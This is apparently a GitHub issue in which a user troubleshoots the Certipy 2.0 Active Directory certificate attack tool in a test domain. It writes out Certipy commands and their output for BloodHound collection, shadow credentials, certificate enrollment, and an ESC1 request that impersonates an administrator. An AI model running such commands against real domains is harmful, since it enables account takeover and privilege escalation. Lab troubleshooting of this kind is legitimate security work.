Certipy
Several errors trying Certify 2.0 intro techniques
I've been working my way through a number of the Certify 2.0 features that were described here: https://research.ifcr.dk/certipy-2-0-bloodhound-new-escalations-shadow-credentials-golden-certificates-and-more-34d1c26f0dc6
I created a simple domain user named john to match your examples but I'm having issues with a few commands:
#1 Bloodhound: I can't see any data from the bloodhound import:
Certipy find "toondom.com/john:[email protected]" -bloodhound
[*] Finding certificate templates
[*] Found 33 certificate templates
[*] Finding certificate authorities
[*] Found 1 certificate authority
[*] Trying to get CA configuration for 'toondom-TOONDOMCA-EXT-CA' via CSRA
[!] Got error while trying to get CA configuration for 'toondom-TOONDOMCA-EXT-CA' via CSRA: CASessionError: code: 0x80070005 - E_ACCESSDENIED - General access denied error.
[*] Trying to get CA configuration for 'toondom-TOONDOMCA-EXT-CA' via RRP
[!] Failed to connect to remote registry. Service should be starting now. Trying again...
[*] Got CA configuration for 'toondom-TOONDOMCA-EXT-CA'
[*] Found 12 enabled certificate templates
[*] Saved BloodHound data to '20220812181400_Certipy.zip'. Drag and drop the file into the BloodHound GUI
The command worked and if I drag and drop the .zip file onto the Bloodhound Windows GUI, I see the import process but no data shows up in the Bloodhound console.
#2 I tried the shadow technique but got this error:
Certipy shadow auto "toondom.com/john:[email protected]" -account 'johnpc'
[*] Targeting user "'JOHNPC'$"
[*] Generating certificate
[*] Certificate generated
[*] Generating Key Credential
[*] Key Credential generated with DeviceID '2d258854-0eb1-5bae-5020-4384cc4dd67c'
[-] Got error: invalid attribute type msDS-KeyCredentialLink
Any idea why it doesn't like attribute type msDS-KeyCredentialLink?
#3
Certipy req "toondom.com/john:[email protected]" -ca "toondom-TOONDOMCA-EXT-CA" -template "Machine"
[*] Requesting certificate
[-] Got error while trying to request certificate: code: 0x80094012 - CERTSRV_E_TEMPLATE_DENIED - The permissions on the certificate template do not allow the current user to enroll for this type of certificate.
[*] Request ID is 14
Would you like to save the private key? (y/N) n
Why would I get CERTSRV_E_TEMPLATE_DENIED?
#4 In your article about the ESC1 exploit, you have an example command like this:
Certipy req "toondom.com/john:[email protected]" -ca "toondom-TOONDOMCA-EXT-CA" -template "ESC1" -alt '[email protected]'
But ESC1 is not a valid template so I'm assuming it is a vulnerable template that was discovered by Bloodhound and I would use that name instead. How can I use Certify to directly show me any vulnerable templates? I found an old blog by someone that used the find -vulnerable command but that does not seem to be valid in Certify 2.0.
Sorry about so many questions in 1 issue.
Thanks, Rick